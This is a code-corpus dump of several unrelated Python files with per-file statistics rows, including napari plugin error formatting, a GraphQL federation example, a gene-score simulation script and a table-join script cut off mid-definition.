                    fields, key=lambda f: (f['@name'] is not None, f['@name']))
            summary_info = result.get_summary()
            entry['content_id'] = summary_info.get('content_id', 'Not provided')
            entries.append(entry)
    return 'get_ticket.html'
def list_tickets(provides, all_results, context):
    """Build the render context for the list_tickets view.

    Two passes over ``all_results``: the first collects every field name
    seen in any record (these become the dynamic table headers after the
    fixed 'application' / 'content id' columns); the second builds one
    display row per record.  Returns the template name.
    """
    headers = ['application', 'content id']
    rows_out = []
    context['results'] = rows_out
    # Pass 1: gather the set of field names across all records.
    seen_names = set()
    for summary, action_results in all_results:
        for result in action_results:
            for record in result.get_data():
                seen_names.update(f.get('@name', '').strip()
                                  for f in record.get('Field', []))
    if not seen_names:
        seen_names.update(headers)
    headers = headers + sorted(seen_names)
    table = {'headers': headers, 'data': []}
    dynamic = headers[2:]
    # Pass 2: one row per returned record.
    for summary, action_results in all_results:
        for result in action_results:
            param = result.get_param()
            for item in result.get_data():
                row = [
                    {'value': param.get('application'),
                     'contains': ['archer application']},
                    {'value': item.get('@contentId'),
                     'contains': ['archer content id']},
                ]
                name_value = {f['@name']: f.get('#text')
                              for f in item.get('Field', [])}
                for name in dynamic:
                    cell = {'value': name_value.get(name, '')}
                    if name == 'IP Address':
                        # Tag IP cells so the UI can make them actionable.
                        cell['contains'] = ['ip']
                    row.append(cell)
                table['data'].append(row)
    rows_out.append(table)
    return 'list_tickets.html'
| 38.350649
| 95
| 0.562817
| 343
| 2,953
| 4.734694
| 0.346939
| 0.036946
| 0.034483
| 0.042488
| 0.142241
| 0.142241
| 0.142241
| 0.10899
| 0.10899
| 0.10899
| 0
| 0.006927
| 0.315611
| 2,953
| 76
| 96
| 38.855263
| 0.796635
| 0.196072
| 0
| 0.192308
| 0
| 0
| 0.12802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96886f093360dec7c0ce79819456ac3947c46e0
| 12,198
|
py
|
Python
|
napari/plugins/exceptions.py
|
yinawang28/napari
|
6ea95a9fa2f9150a4dbb5ec1286b8ff2020c3957
|
[
"BSD-3-Clause"
] | null | null | null |
napari/plugins/exceptions.py
|
yinawang28/napari
|
6ea95a9fa2f9150a4dbb5ec1286b8ff2020c3957
|
[
"BSD-3-Clause"
] | null | null | null |
napari/plugins/exceptions.py
|
yinawang28/napari
|
6ea95a9fa2f9150a4dbb5ec1286b8ff2020c3957
|
[
"BSD-3-Clause"
] | null | null | null |
import re
import sys
from collections import defaultdict
from types import TracebackType
from typing import (
Callable,
DefaultDict,
Dict,
Generator,
List,
Optional,
Tuple,
Type,
Union,
)
# This is a mapping of plugin_name -> PluginError instances
# all PluginErrors get added to this in PluginError.__init__
PLUGIN_ERRORS: DefaultDict[str, List['PluginError']] = defaultdict(list)
# standard tuple type returned from sys.exc_info()
ExcInfoTuple = Tuple[Type[Exception], Exception, Optional[TracebackType]]
# importlib.metadata entered the stdlib in Python 3.8; older interpreters
# fall back to the importlib_metadata backport (same API).
if sys.version_info >= (3, 8):
    from importlib import metadata as importlib_metadata
else:
    import importlib_metadata
# Alias so the rest of the module is agnostic about which implementation
# was imported.
Distribution = importlib_metadata.Distribution
class PluginError(Exception):
    """Base class for all plugin-related errors.

    Instantiating a PluginError (whether raised or not), adds the exception
    instance to the PLUGIN_ERRORS dict for later retrieval.

    Parameters
    ----------
    message : str
        A message for the exception
    plugin_name : str
        The name of the plugin that had the error
    plugin_module : str
        The module of the plugin that had the error
    """

    def __init__(self, message: str, plugin_name: str, plugin_module: str):
        super().__init__(message)
        self.plugin_name = plugin_name
        self.plugin_module = plugin_module
        # Side effect: register this instance in the module-level error
        # map so callers can later list every error for a plugin.
        PLUGIN_ERRORS[plugin_name].append(self)

    def format_with_contact_info(self) -> str:
        """Make formatted string with context and contact info if possible."""
        # circular imports
        from napari import __version__

        msg = f'\n\nPluginError: {self}'
        msg += '\n(Use "Plugins > Plugin errors..." to review/report errors.)'
        if self.__cause__:
            # Indent continuation lines of the chained cause so they line
            # up under the "Cause was:" label.
            cause = str(self.__cause__).replace("\n", "\n" + " " * 13)
            msg += f'\n Cause was: {cause}'
        contact = fetch_module_metadata(self.plugin_module)
        if contact:
            extra = [f'{k: >11}: {v}' for k, v in contact.items()]
            extra += [f'{"napari": >11}: v{__version__}']
            # NOTE(review): the joined block is appended without a leading
            # newline separator -- confirm the resulting layout is intended.
            msg += "\n".join(extra)
        msg += '\n'
        return msg

    def info(self,) -> ExcInfoTuple:
        """Return info as would be returned from sys.exc_info()."""
        return (self.__class__, self, self.__traceback__)
class PluginImportError(PluginError, ImportError):
    """Raised when a plugin fails to import."""

    def __init__(self, plugin_name: str, plugin_module: str):
        # Registration in PLUGIN_ERRORS happens in the base class.
        message = f"Failed to import plugin: '{plugin_name}'"
        super().__init__(message, plugin_name, plugin_module)
class PluginRegistrationError(PluginError):
    """Raised when a plugin fails to register with pluggy."""

    def __init__(self, plugin_name: str, plugin_module: str):
        # Registration in PLUGIN_ERRORS happens in the base class.
        message = f"Failed to register plugin: '{plugin_name}'"
        super().__init__(message, plugin_name, plugin_module)
def format_exceptions(plugin_name: str, as_html: bool = False):
    """Return formatted tracebacks for all exceptions raised by plugin.

    Parameters
    ----------
    plugin_name : str
        The name of a plugin for which to retrieve tracebacks.
    as_html : bool
        Whether to return the exception string as formatted html,
        defaults to False.

    Returns
    -------
    str
        A formatted string with traceback information for every exception
        raised by ``plugin_name`` during this session; an empty string
        when no errors were recorded for the plugin.
    """
    _plugin_errors: Optional[List[PluginError]] = PLUGIN_ERRORS.get(plugin_name)
    if not _plugin_errors:
        return ''

    # Imported here to avoid a circular import at module load time.
    from napari import __version__

    format_exc_info = get_tb_formatter()

    _linewidth = 80
    # Pad so the "Errors for plugin ..." title sits centered in the rule.
    _pad = (_linewidth - len(plugin_name) - 18) // 2
    msg = [
        f"{'=' * _pad} Errors for plugin '{plugin_name}' {'=' * _pad}",
        '',
        f'{"napari version": >16}: {__version__}',
    ]

    err0 = _plugin_errors[0]
    package_meta = fetch_module_metadata(err0.plugin_module)
    if package_meta:
        msg.extend(
            [
                f'{"plugin package": >16}: {package_meta["package"]}',
                f'{"version": >16}: {package_meta["version"]}',
                f'{"module": >16}: {err0.plugin_module}',
            ]
        )
    msg.append('')
    # One numbered section per recorded error, each with a full traceback.
    for n, err in enumerate(_plugin_errors):
        _pad = _linewidth - len(str(err)) - 10
        msg += ['', f'ERROR #{n + 1}: {str(err)} {"-" * _pad}', '']
        msg.append(format_exc_info(err.info(), as_html))
    msg.append('=' * _linewidth)
    return ("<br>" if as_html else "\n").join(msg)
def get_tb_formatter() -> Callable[[ExcInfoTuple, bool], str]:
    """Return a formatter callable that uses IPython VerboseTB if available.

    Imports IPython lazily if available to take advantage of ultratb.VerboseTB.
    If unavailable, cgitb is used instead, but this function overrides a lot of
    the hardcoded citgb styles and adds error chaining (for exceptions that
    result from other exceptions).

    Returns
    -------
    callable
        A function that accepts a 3-tuple and a boolean ``(exc_info, as_html)``
        and returns a formatted traceback string. The ``exc_info`` tuple is of
        the ``(type, value, traceback)`` format returned by sys.exc_info().
        The ``as_html`` determines whether the traceback is formated in html
        or plain text.
    """
    try:
        import IPython.core.ultratb

        def format_exc_info(info: ExcInfoTuple, as_html: bool) -> str:
            # Colorized traceback via IPython's VerboseTB; 'Linux' scheme
            # emits ANSI codes which ansi2html converts for HTML output.
            color = 'Linux' if as_html else 'NoColor'
            vbtb = IPython.core.ultratb.VerboseTB(color_scheme=color)
            if as_html:
                # NOTE(review): the replacement target below appears to be
                # a non-breaking space (possibly '&nbsp;'/U+00A0 in the
                # original source, mangled by extraction) -- confirm
                # against upstream before relying on exact output.
                ansi_string = vbtb.text(*info).replace(" ", " ")
                html = "".join(ansi2html(ansi_string))
                html = html.replace("\n", "<br>")
                html = (
                    "<span style='font-family: monaco,courier,monospace;'>"
                    + html
                    + "</span>"
                )
                return html
            else:
                return vbtb.text(*info)

    except ImportError:
        import cgitb
        import traceback

        # cgitb does not support error chaining...
        # see https://www.python.org/dev/peps/pep-3134/#enhanced-reporting
        # this is a workaround
        def cgitb_chain(exc: Exception) -> Generator[str, None, None]:
            """Recurse through exception stack and chain cgitb_html calls."""
            if exc.__cause__:
                yield from cgitb_chain(exc.__cause__)
                yield (
                    '<br><br><font color="#51B432">The above exception was '
                    'the direct cause of the following exception:</font><br>'
                )
            elif exc.__context__:
                yield from cgitb_chain(exc.__context__)
                yield (
                    '<br><br><font color="#51B432">During handling of the '
                    'above exception, another exception occurred:</font><br>'
                )
            yield cgitb_html(exc)

        def cgitb_html(exc: Exception) -> str:
            """Format exception with cgitb.html."""
            info = (type(exc), exc, exc.__traceback__)
            return cgitb.html(info)

        def format_exc_info(info: ExcInfoTuple, as_html: bool) -> str:
            if as_html:
                html = "\n".join(cgitb_chain(info[1]))
                # cgitb has a lot of hardcoded colors that don't work for us
                # remove bgcolor, and let theme handle it
                html = re.sub('bgcolor="#.*"', '', html)
                # remove superfluous whitespace
                html = html.replace('<br>\n', '\n')
                # but retain it around the <small> bits
                html = re.sub(r'(<tr><td><small.*</tr>)', f'<br>\\1<br>', html)
                # weird 2-part syntax is a workaround for hard-to-grep text.
                html = html.replace(
                    "<p>A problem occurred in a Python script. "
                    "Here is the sequence of",
                    "",
                )
                html = html.replace(
                    "function calls leading up to the error, "
                    "in the order they occurred.</p>",
                    "<br>",
                )
                # remove hardcoded fonts
                html = html.replace('face="helvetica, arial"', "")
                html = (
                    "<span style='font-family: monaco,courier,monospace;'>"
                    + html
                    + "</span>"
                )
                return html
            else:
                # if we don't need HTML, just use traceback
                return ''.join(traceback.format_exception(*info))

    return format_exc_info
def fetch_module_metadata(dist: Union[Distribution, str]) -> Dict[str, str]:
    """Attempt to retrieve name, version, contact email & url for a package.

    Parameters
    ----------
    dist : str or Distribution
        Distribution object or name of a distribution. If a string, it must
        match the *name* of the package in the METADATA file... not the name
        of the module.

    Returns
    -------
    package_info : dict
        A dict with metadata about the package; empty when the
        distribution cannot be found.
    """
    if isinstance(dist, Distribution):
        meta = dist.metadata
    else:
        try:
            meta = importlib_metadata.metadata(dist)
        except importlib_metadata.PackageNotFoundError:
            # Unknown distribution name -> nothing to report.
            return {}
    # Simple one-to-one METADATA headers.
    field_map = {
        'package': 'Name',
        'version': 'Version',
        'summary': 'Summary',
        'author': 'Author',
        'license': 'License',
    }
    info = {key: meta.get(header, '') for key, header in field_map.items()}
    # Headers with a fallback alternative.
    info['url'] = meta.get('Home-page') or meta.get('Download-Url', '')
    info['email'] = meta.get('Author-Email') or meta.get('Maintainer-Email', '')
    return info
# Mapping of SGR (Select Graphic Rendition) ANSI parameter codes to the
# CSS properties used when converting terminal output to HTML in
# ansi2html.  Keys are the integer parameters of an ESC[<n>m sequence.
ANSI_STYLES = {
    1: {"font_weight": "bold"},
    2: {"font_weight": "lighter"},
    3: {"font_weight": "italic"},
    4: {"text_decoration": "underline"},
    5: {"text_decoration": "blink"},
    6: {"text_decoration": "blink"},
    8: {"visibility": "hidden"},
    9: {"text_decoration": "line-through"},
    30: {"color": "black"},
    31: {"color": "red"},
    32: {"color": "green"},
    33: {"color": "yellow"},
    34: {"color": "blue"},
    35: {"color": "magenta"},
    36: {"color": "cyan"},
    37: {"color": "white"},
}
def ansi2html(
    ansi_string: str, styles: Dict[int, Dict[str, str]] = ANSI_STYLES
) -> Generator[str, None, None]:
    """Convert ansi string to colored HTML

    Parameters
    ----------
    ansi_string : str
        text with ANSI color codes.
    styles : dict, optional
        A mapping from ANSI codes to a dict of css kwargs:values,
        by default ANSI_STYLES

    Yields
    -------
    str
        HTML strings that can be joined to form the final html
    """
    previous_end = 0
    in_span = False
    ansi_codes = []
    # NOTE(review): the final character class '[a-zA-z]' also matches the
    # punctuation between 'Z' and 'a' -- presumably '[a-zA-Z]' was meant.
    ansi_finder = re.compile("\033\\[" "([\\d;]*)" "([a-zA-z])")
    for match in ansi_finder.finditer(ansi_string):
        # Emit the plain text between the previous escape and this one.
        yield ansi_string[previous_end : match.start()]
        previous_end = match.end()
        params, command = match.groups()

        # Only SGR ('m') commands affect styling; skip everything else.
        if command not in "mM":
            continue

        try:
            params = [int(p) for p in params.split(";")]
        except ValueError:
            params = [0]

        for i, v in enumerate(params):
            if v == 0:
                # Code 0 resets all styling: close any open span and keep
                # only the parameters that follow the reset.
                params = params[i + 1 :]
                if in_span:
                    in_span = False
                    yield "</span>"
                ansi_codes = []
                if not params:
                    continue

        ansi_codes.extend(params)
        if in_span:
            yield "</span>"
            in_span = False
        if not ansi_codes:
            continue

        # Translate the accumulated codes into inline CSS.
        style = [
            "; ".join([f"{k}: {v}" for k, v in styles[k].items()]).strip()
            for k in ansi_codes
            if k in styles
        ]
        yield '<span style="%s">' % "; ".join(style)
        in_span = True

    # Trailing text after the last escape code, then close any open span.
    yield ansi_string[previous_end:]
    if in_span:
        yield "</span>"
        in_span = False
| 33.237057
| 79
| 0.565175
| 1,413
| 12,198
| 4.719038
| 0.251239
| 0.026995
| 0.011698
| 0.005399
| 0.128374
| 0.104979
| 0.080084
| 0.072286
| 0.063887
| 0.063887
| 0
| 0.009423
| 0.312674
| 12,198
| 366
| 80
| 33.327869
| 0.785902
| 0.251599
| 0
| 0.205357
| 0
| 0
| 0.175482
| 0.019296
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058036
| false
| 0
| 0.080357
| 0
| 0.205357
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9693a49a18c1714e3e73fb34025f16a983d9fca
| 572
|
py
|
Python
|
examples/federation/account.py
|
syfun/starlette-graphql
|
1f57b60a9699bc6a6a2b95d5596ffa93ef13c262
|
[
"MIT"
] | 14
|
2020-04-03T08:18:21.000Z
|
2021-11-10T04:39:45.000Z
|
examples/federation/account.py
|
syfun/starlette-graphql
|
1f57b60a9699bc6a6a2b95d5596ffa93ef13c262
|
[
"MIT"
] | 2
|
2021-08-31T20:25:23.000Z
|
2021-09-21T14:40:56.000Z
|
examples/federation/account.py
|
syfun/starlette-graphql
|
1f57b60a9699bc6a6a2b95d5596ffa93ef13c262
|
[
"MIT"
] | 1
|
2020-08-27T17:04:29.000Z
|
2020-08-27T17:04:29.000Z
|
import uvicorn
from gql import gql, reference_resolver, query
from stargql import GraphQL
from helper import get_user_by_id, users
type_defs = gql("""
type Query {
me: User
}
type User @key(fields: "id") {
id: ID!
name: String
username: String
}
""")
@query('me')
def get_me(_, info):
    """Resolver for the root `me` query: returns the first demo user."""
    current_user = users[0]
    return current_user
@reference_resolver('User')
def user_reference(_, info, representation):
    """Resolve a federated `User` reference by its `id` key field."""
    user_id = representation['id']
    return get_user_by_id(user_id)
# Expose the schema as a federation-capable ASGI GraphQL app.
app = GraphQL(type_defs=type_defs, federation=True)

if __name__ == '__main__':
    uvicorn.run(app, port=8082)
| 16.342857
| 51
| 0.687063
| 79
| 572
| 4.683544
| 0.455696
| 0.064865
| 0.048649
| 0.059459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010799
| 0.190559
| 572
| 34
| 52
| 16.823529
| 0.788337
| 0
| 0
| 0
| 0
| 0
| 0.241259
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.173913
| 0.086957
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96af4a490471a665152773f8f3b2a90f985672a
| 607
|
py
|
Python
|
tests/backtracking/test_path_through_grid.py
|
davjohnst/fundamentals
|
f8aff4621432c3187305dd04563425f54ea08495
|
[
"Apache-2.0"
] | null | null | null |
tests/backtracking/test_path_through_grid.py
|
davjohnst/fundamentals
|
f8aff4621432c3187305dd04563425f54ea08495
|
[
"Apache-2.0"
] | null | null | null |
tests/backtracking/test_path_through_grid.py
|
davjohnst/fundamentals
|
f8aff4621432c3187305dd04563425f54ea08495
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from unittest import TestCase
from fundamentals.backtracking.path_through_grid import PathThroughGrid
class TestPathThroughGrid(TestCase):
    """Unit tests for PathThroughGrid's backtracking path search."""

    def test_no_path(self):
        """A grid with no connected route of 1-cells yields no path."""
        grid = [
            [0, 1, 0],
            [1, 0, 1],
            [0, 0, 1]
        ]
        ptg = PathThroughGrid(grid)
        self.assertIsNone(ptg.get_path())

    def test_path(self):
        """A connected route is returned as a list of (row, col) steps."""
        grid = [
            [1, 1, 0],
            [1, 1, 1],
            [0, 0, 1]
        ]
        ptg = PathThroughGrid(grid)
        # assertEqual: `assertEquals` is a deprecated alias that was
        # removed in Python 3.12.
        self.assertEqual(
            [(0, 0), (0, 1), (1, 1), (1, 2), (2, 2)], ptg.get_path())
| 22.481481
| 82
| 0.507414
| 74
| 607
| 4.067568
| 0.364865
| 0.046512
| 0.0299
| 0.026578
| 0.215947
| 0.199336
| 0.199336
| 0.199336
| 0
| 0
| 0
| 0.070352
| 0.344316
| 607
| 27
| 82
| 22.481481
| 0.68593
| 0.032949
| 0
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.105263
| false
| 0
| 0.105263
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96b923ab99cdd18285399edd12e8dfeb03b5f78
| 343
|
py
|
Python
|
main.py
|
yukraven/vitg
|
27d3d9b73a23e4ff5ff4c769eb1f26b8f57fee72
|
[
"MIT"
] | null | null | null |
main.py
|
yukraven/vitg
|
27d3d9b73a23e4ff5ff4c769eb1f26b8f57fee72
|
[
"MIT"
] | 63
|
2019-08-25T07:48:54.000Z
|
2019-10-18T01:52:29.000Z
|
main.py
|
yukraven/vitg
|
27d3d9b73a23e4ff5ff4c769eb1f26b8f57fee72
|
[
"MIT"
] | null | null | null |
import sqlite3
import Sources.Parser
# Open the bundled SQLite inventory and dump the Locations table to
# stdout (relies on Database/vitg.db existing relative to the CWD).
conn = sqlite3.connect("Database/vitg.db")
cursor = conn.cursor()
cursor.execute("SELECT * FROM Locations")
results = cursor.fetchall()
print(results)
conn.close()

# Run each sample word through the parser and print its command.
parser = Sources.Parser.Parser()
# NOTE(review): Russian infinitives ("to love", "to hit") -- presumably
# demo input; confirm the intended data source.
words = [u"любить", u"бить"]
for word in words:
    command = parser.getCommand(word)
    print(command)
| 19.055556
| 42
| 0.725948
| 45
| 343
| 5.533333
| 0.6
| 0.104418
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006734
| 0.134111
| 343
| 17
| 43
| 20.176471
| 0.83165
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96d512247f8395a641feee824bc046d0dbdc522
| 7,018
|
py
|
Python
|
src/gene.score.array.simulator.py
|
ramachandran-lab/PEGASUS-WINGS
|
bdd81b58be4c4fb62916e422a854abdcbfbb6fd7
|
[
"MIT"
] | 3
|
2019-03-31T12:32:25.000Z
|
2020-01-04T20:57:14.000Z
|
src/gene.score.array.simulator.py
|
ramachandran-lab/PEGASUS-WINGS
|
bdd81b58be4c4fb62916e422a854abdcbfbb6fd7
|
[
"MIT"
] | null | null | null |
src/gene.score.array.simulator.py
|
ramachandran-lab/PEGASUS-WINGS
|
bdd81b58be4c4fb62916e422a854abdcbfbb6fd7
|
[
"MIT"
] | 1
|
2020-10-24T23:48:15.000Z
|
2020-10-24T23:48:15.000Z
|
import numpy as np
import pandas as pd
import sys
import string
import time
import subprocess
from collections import Counter
import string
import random
def random_pheno_generator(size=6, chars=string.ascii_lowercase):
    """Return a random identifier of `size` characters drawn from `chars`."""
    picked = [random.choice(chars) for _ in range(size)]
    return ''.join(picked)
#First argument is the gene score distribution that you want to draw from, the second is the type of clusters to generate
#If 'large' only clusters with a large number of shared genes will be simulated
#If 'mixed' one cluster with only a few shared genes will be simulated
# Output root for all simulation results.  Best-effort: if it already
# exists, mkdir's error goes to stderr and execution continues.
subprocess.call('mkdir NewSims_nothreshenforced',shell = True)
if len(sys.argv) < 3:
    sys.exit("Enter the ICD10 code of interest as the first argument, and either 'mixed' or 'large' as the second argument depending on desired number of significant genes in a cluster.")
class simulator():
def __init__(self,type_of_clusters,num_draws,sim_status,percentage,sim_label):
self.example_dist = pd.read_csv('merged.pegasus.results.'+ sys.argv[1] + '.txt', delimiter = '\t').set_index('Gene')
self.genes = np.array(self.example_dist.index.tolist())
self.num_clusters = int(np.random.uniform(2,int(num_draws) * 0.15))
# self.num_clusters = int(np.random.uniform(2,3))
self.phenos = np.array([random_pheno_generator() for i in range(num_draws)])
self.clusters = {}
self.unique_sig_genes = {}
self.cluster_type = type_of_clusters
self.percentage = float(percentage)/100
self.draw_status = sim_status
self.sim_label = sim_label
if self.draw_status == 'limited':
self.num_draws = num_draws
else:
self.num_draws == 100000000000
def _gen_clusters_(self):
self.possible_genes = list(self.genes)
self.possible_phenos = list(self.phenos)
total_genes = 175
self.ref_count = {}
for i in range(self.num_clusters):
#Set size of clusters, both number of phenos and sig genes
num_sig_shared_genes = int(total_genes*self.percentage)
genes,phenos = self.cluster_sharing(num_sig_shared_genes,np.random.randint(2,8),self.possible_genes,self.possible_phenos)
#Update sets of genes and phenos so that there is not overlap between the clusters (first run)
self.possible_phenos = list(set(self.possible_phenos).difference(phenos))
self.possible_genes = list(set(self.possible_genes).difference(genes))
self.clusters['cluster' + str(i)] = {'Gene':list(genes),'Phenos':list(phenos)}
for j in phenos:
self.ref_count[str(j)] = len(genes)
for i in self.phenos:
if i not in self.ref_count.keys():
self.ref_count[i] = 0
self.unique_genes(self.phenos)
def cluster_sharing(self,num_unique_genes,num_unique_phenos,possible_genes,possible_phenos):
genes = set()
while len(genes) < num_unique_genes:
genes.add(np.random.choice(possible_genes))
phenos = set()
while len(phenos) < num_unique_phenos:
phenos.add(np.random.choice(possible_phenos))
return genes,phenos
def draw_counter(self,gene_dict,selected_genes):
if self.draw_status == 'limited':
for i in selected_genes:
gene_dict[i] +=1
for x,y in gene_dict.items():
if y >= self.num_draws:
del gene_dict[x]
return gene_dict
else:
return gene_dict
#Generates a list of genes that are also significant for each phenotype, whether or not they have been assigned to a cluster
def unique_genes(self,phenos):
self.counter_dict = {}
for i in self.possible_genes:
self.counter_dict[i] = 0
for pheno in phenos:
self.number_siggenes = 175
pheno_only_genes = np.random.choice(self.possible_genes, size = int(self.number_siggenes - self.ref_count[pheno]),replace = False)
self.counter_dict = self.draw_counter(self.counter_dict,pheno_only_genes)
self.unique_sig_genes[pheno] = list(set(pheno_only_genes))
self.possible_genes = list(self.counter_dict.keys())
def generate_matrix(self):
all_scores = np.array(self.example_dist).flatten()
small_scores = all_scores[all_scores <= 0.001]
non_sig_scores = all_scores[all_scores > 0.001]
data = np.zeros((len(self.phenos),len(self.genes)))
for j in range(len(self.phenos)):
data[j] = np.negative(np.log(np.array(np.random.choice(non_sig_scores,len(self.genes)))))
scorematrix = pd.DataFrame(data.T,index = self.genes,columns = self.phenos)
for key,value in self.clusters.items():
for phenotype in value['Phenos']:
for gene in value['Gene']:
self.unique_sig_genes[phenotype].append(gene)
#Fill in significant gene scores that are unique to each phenotype
for key,value in self.unique_sig_genes.items():
for x in value:
scorematrix.loc[x,key] = np.negative(np.log(np.random.choice(small_scores)))
return scorematrix
def write(self,dataframe):
if self.draw_status == 100000000000:
y = str(self.percentage) + '_' + str(self.sim_label)
subprocess.call('mkdir NewSims_nothreshenforced/Simulations' + y+str(self.num_clusters),shell = True)
dataframe = dataframe*-1
dataframe = 10**dataframe.astype(float)
dataframe.index.name = 'Gene'
dataframe.to_csv('NewSims_nothreshenforced/Simulations'+y+str(self.num_clusters)+'/Simulated.scores.using.' + sys.argv[1] + '.gene.dist.' + y + '.csv', header = True, index = True)
for key,value in self.clusters.items():
newfile = open('NewSims_nothreshenforced/Simulations'+y+str(self.num_clusters)+ '/' + str(key) + 'gene.and.pheno.info.txt','w')
newfile.write('Shared Significant Genes:\n')
newfile.write(','.join(value["Gene"]))
newfile.write('\nPhenos:\n')
newfile.write(','.join(value['Phenos']))
else:
y = str(self.percentage) + '_' + str(self.sim_label)
subprocess.call('mkdir NewSims_nothreshenforced/Simulations' + y + '_num_draws_' + str(self.num_draws),shell = True)
dataframe = dataframe*-1
dataframe = 10**dataframe.astype(float)
dataframe.index.name = 'Gene'
dataframe.to_csv('NewSims_nothreshenforced/Simulations'+y+ '_num_draws_' + str(self.num_draws) + '/Simulated.scores.using.' + sys.argv[1] + '.gene.dist.' + str(self.num_clusters) + '.clusters.' + str(self.num_draws)+'.pos.draws.csv', header = True, index = True)
for key,value in self.clusters.items():
newfile = open('NewSims_nothreshenforced/Simulations'+y+ '_num_draws_' + str(self.num_draws)+ '/' + str(key) + 'gene.and.pheno.info.txt','w')
newfile.write('Shared Significant Genes:\n')
newfile.write(','.join(value["Gene"]))
newfile.write('\nPhenos:\n')
newfile.write(','.join(value['Phenos']))
def test(self):
    """Run one full simulation: build the clusters, generate the simulated
    score matrix, and write all output files."""
    self._gen_clusters_()
    scores = self.generate_matrix()
    self.write(scores)
def main():
    """Sweep the full simulation parameter grid and run every configuration."""
    phenotype_counts = [25, 50, 75, 100]      # phenotypes per simulation
    shared_percentages = [1, 10, 25, 50, 75]  # % shared significant architecture per cluster
    replicates = 1000                         # simulations per parameter set
    for n_phenos in phenotype_counts:
        for pct in shared_percentages:
            for rep in range(1, replicates + 1):
                print('Generated {}% with unlimited random draws simulation,{} phenotypes: {}'.format(pct, n_phenos, rep))
                sim = simulator(sys.argv[2], n_phenos, 'limited', pct, rep)
                sim.test()
main()
| 43.320988
| 265
| 0.727273
| 1,063
| 7,018
| 4.650047
| 0.206021
| 0.021242
| 0.016185
| 0.042484
| 0.319644
| 0.251871
| 0.251871
| 0.234473
| 0.195226
| 0.195226
| 0
| 0.014769
| 0.141351
| 7,018
| 161
| 266
| 43.590062
| 0.805509
| 0.120262
| 0
| 0.215385
| 0
| 0.007692
| 0.140399
| 0.057945
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.069231
| 0.007692
| 0.192308
| 0.007692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c97156d460bdc88e5f228d10d1465d45738af933
| 8,536
|
py
|
Python
|
other_useful_scripts/join.py
|
sklasfeld/ChIP_Annotation
|
9ce9db7a129bfdec91ec23b33d73ff22f37408ad
|
[
"MIT"
] | 1
|
2020-08-23T23:12:56.000Z
|
2020-08-23T23:12:56.000Z
|
other_useful_scripts/join.py
|
sklasfeld/ChIP_Annotation
|
9ce9db7a129bfdec91ec23b33d73ff22f37408ad
|
[
"MIT"
] | null | null | null |
other_useful_scripts/join.py
|
sklasfeld/ChIP_Annotation
|
9ce9db7a129bfdec91ec23b33d73ff22f37408ad
|
[
"MIT"
] | 1
|
2020-08-23T23:16:47.000Z
|
2020-08-23T23:16:47.000Z
|
#!/usr/bin/env python3
# -*- coding: iso-8859-15 -*-
# 2017, Samantha Klasfeld, the Wagner Lab
# the Perelman School of Medicine, the University of Pennsylvania
# Samantha Klasfeld, 12-21-2017
import argparse
import sys
import pandas as pd
import numpy as np
# Build the command-line interface. argparse reflows help text, so internal
# whitespace in the help strings is not significant.
# BUG FIX: the description string was garbled ("takes in a 2 tables and
# performs a joins them"); reworded to plain English.
parser = argparse.ArgumentParser(description="this script takes \
in 2 tables and joins them to create a merged table")
# Positional arguments: the two inputs and the output path.
parser.add_argument('left_table', help='left table file name')
parser.add_argument('right_table', help='right table file name')
parser.add_argument('out_table', help='output table file name')
# Join behavior (mirrors pandas.DataFrame.merge parameters).
parser.add_argument('-w','--how', help='Type of merge to be performed: \
`left`,`right`,`outer`,`inner`, `antileft`. Default:`inner`',
    choices=['left', 'right', 'outer', 'inner', 'antileft'], default='inner')
parser.add_argument('-j','--on', help='Column or index level names \
to join on. These must be found in both DataFrames. If on is None \
and not merging on indexes then this defaults to the intersection \
